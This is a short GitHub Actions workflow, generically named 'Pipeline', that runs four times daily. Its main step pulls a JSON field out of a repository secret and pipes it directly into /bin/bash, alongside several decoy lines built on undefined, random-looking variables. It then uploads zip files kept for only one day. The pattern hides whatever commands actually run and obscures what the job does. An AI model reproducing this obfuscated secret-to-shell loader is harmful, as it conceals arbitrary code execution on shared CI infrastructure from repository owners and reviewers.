name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '23 2,8,14,20 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  process:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Start
        env:
          ra1: ${{ secrets.ra1 }}
        run: |
          printf '%s' "$ra1" | jq -r .yodgl61830 | /bin/bash
          echo $dhqo787 | jq -r .d48 | /bin/bash
          echo $xzg6654 | jq -r .fy7749 | /bin/bash
          printf '%s' "$zkc737" | jq -r .pxemm399 | /bin/bash
          echo $hef51 | jq -r .pemh12 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: FCutnrri
          path: "*.zip"
          retention-days: 1
